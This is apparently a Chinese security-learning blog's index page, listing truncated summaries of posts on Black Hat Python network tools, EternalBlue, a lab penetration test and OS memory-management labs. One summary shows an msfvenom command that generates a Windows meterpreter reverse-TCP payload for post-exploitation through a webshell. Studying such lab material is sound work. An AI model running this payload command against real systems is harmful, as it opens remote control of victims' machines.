yaolingyu

摘要： 1.代码及代码讲解。 代码编写工具：VsCode （1）socket嗅探器 首先第一个脚本是最简单的原始socket嗅探器，它只会读一个数据包，然后直接退出： import socket import os #host to listen on HOST = ''#这里输入自己的IP地址 def m 阅读全文

摘要： 1.代码及代码讲解。 实验环境：windows10下的linux子系统+kali虚拟机 import argparse import socket import shlex import subprocess import sys import textwrap import threading d 阅读全文

摘要： 《Python黑帽子——黑客与渗透测试编程之道学习》这本书是我在学习安全的过程中发现的在我看来十分优秀的一本书，业内也拥有很高的评价，所以在这里将自己的学习内容分享出来。 1.基础的网络编程工具。 实验环境：vscode+kali虚拟机 （1）TCP客户端 from ctypes.wintypes 阅读全文

摘要： 一.介绍。 1.什么是永恒之蓝。 永恒之蓝（Eternal Blue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日， 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒，使全世界大范围内遭 阅读全文

摘要： 1.后渗透。 之前我们已经将小马上传，在这里用webshell进行进一步渗透。 1）基于msf 利用msf生成exe，并上传。 msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.248.128 LPORT=1234 -f exe -o 阅读全文

摘要： 1.靶机信息。 win7 x64：ip：192.168.248.129 2008: ip：192.168.138 win2k3:192.168.52.141 攻击机信息： kali：集成各种攻击工具 ip：192.168.248.128 win10：主要进行数据整理。 2.信息搜集。 1）使用kal 阅读全文

摘要： 1. 实验内容： 段式管理（segmentation），是指把一个程序分成若干个段（segment）进行存储，每个段都是一个逻辑实体（logical entity），程序员需要知道并使用它。它的产生是与程序的模块化直接有关的。段式管理是通过段表进行的，它包括段号或段名、段起点、装入位、段的长度等。此 阅读全文

摘要： 1. 实验内容: 分区存储管理是把主存储器中的用户区作为一个连续区或分成若干个连续区进行管理，每个连续区中可装入一个作业或进程。多道程序系统一般都采用多个分区的存储管理方式，具体可分为固定分区和可变分区两种方式。本节实验你将重点学习几种常见的可变式分区存储管理算法并将其实现。2. 实验要点: 理解固 阅读全文

摘要： 1.1社会工程学的起源和发展 在网络空间安全领域, Social Engineering 在国内 通常翻译最多的为“社会工程学”“社交工程”“社 会工程”“社工”等名词。其中“社会工程学”作为 传统字面翻译一直被国内沿用下来, 而“社交工程” 的翻译则从字面直接体现了社交互动的一面。 最初的社会工程 阅读全文

摘要： 1.lab0环境介绍。 2.进入实验界面。 3.进入实战测试。 任务要求： 3.1编写斐波那契数列。 3.2编写Makefile脚本。 Makefile介绍： make命令执行时，需要一个 Makefile 文件，以告诉make命令需要怎么样的去编译和链接程序。 3.3执行make命令。 3.4编写 阅读全文